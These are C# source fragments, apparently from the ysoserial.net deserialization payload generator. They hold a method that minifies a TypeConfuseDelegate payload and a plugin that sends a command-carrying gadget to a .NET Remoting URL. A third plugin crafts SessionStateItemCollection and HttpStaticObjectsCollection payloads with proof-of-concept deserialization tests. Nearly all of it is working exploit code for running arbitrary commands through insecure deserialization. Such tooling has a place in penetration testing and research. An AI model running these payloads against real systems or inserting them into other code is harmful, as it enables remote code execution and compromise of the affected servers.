// this has been used as an example to minify the TypeConfuseDelegateGenerator payload! private void MinimiseTCDJsonAndRun() { string myApp = "TestConsoleApp_YSONET"; sampleInputArgs = new InputArgs(myApp + " /foo bar", true, false, false, false, true, null); bool isErrOk = false; TypeConfuseDelegateGenerator tcdg = new TypeConfuseDelegateGenerator(); byte[] tcd_bf_byte = (byte[])tcdg.GenerateWithNoTest("binaryformatter", sampleInputArgs); string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte), false, true, true); byte[] result = BinaryFormatterMinifier.MinimiseBFAndRun(tcd_bf_byte, sampleInputArgs, isErrOk, true); Console.WriteLine(Encoding.UTF8.GetString(result)); Console.ReadLine(); }
public object Run(string[] args) { List <string> extra; try { extra = options.Parse(args); if (string.IsNullOrWhiteSpace(url)) { throw new ArgumentException("A URL must be provided."); } if (string.IsNullOrWhiteSpace(command)) { throw new ArgumentException("A command must be provided."); } } catch (Exception e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); Environment.Exit(-1); } try { if (secure) { ChannelServices.RegisterChannel(new TcpChannel(), true); } Activator.GetObject(typeof(MarshalByRefObject), url) .Equals(TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(command)); } catch (Exception e) { Console.WriteLine(e.ToString()); Console.WriteLine(); } return("Payload already sent"); }
public object Run(string[] args) { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.Cmd = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } object payload = ""; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } if (mode.ToLower().Equals("sessionstateitemcollection")) { /* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */ /* hacky way begin * byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); * byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem * tempPayload_init.CopyTo(tempPayload, 0); * System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection(); * items[""] = tempPayload; * MemoryStream stream = new MemoryStream(); * BinaryWriter writer = new BinaryWriter(stream); * items.Serialize(writer); * stream.Flush(); * tempPayload = stream.ToArray(); * byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical! * Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes * Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte * newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream * // hacky way ends */ /* here it is using the sane way! */ object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs); System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection(); items[""] = serializedData; MemoryStream stream = new MemoryStream(); BinaryWriter writer = new BinaryWriter(stream); items.Serialize(writer); stream.Flush(); payload = stream.ToArray(); if (test) { // PoC on how it works in practice stream = new MemoryStream((byte[])payload); BinaryReader binReader = new BinaryReader(stream); System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader); test.GetEnumerator(); } } else { // HttpStaticObjectsCollection byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte serializedData.CopyTo(newSerializedData, 7); newSerializedData[0] = 1; // for ReadInt32 newSerializedData[5] = 1; // for ReadBoolean newSerializedData[6] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream payload = newSerializedData; if (test) { // PoC on how it works in practice try { MemoryStream stream = new MemoryStream((byte[])payload); BinaryReader binReader = new BinaryReader(stream); System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } } return(payload); }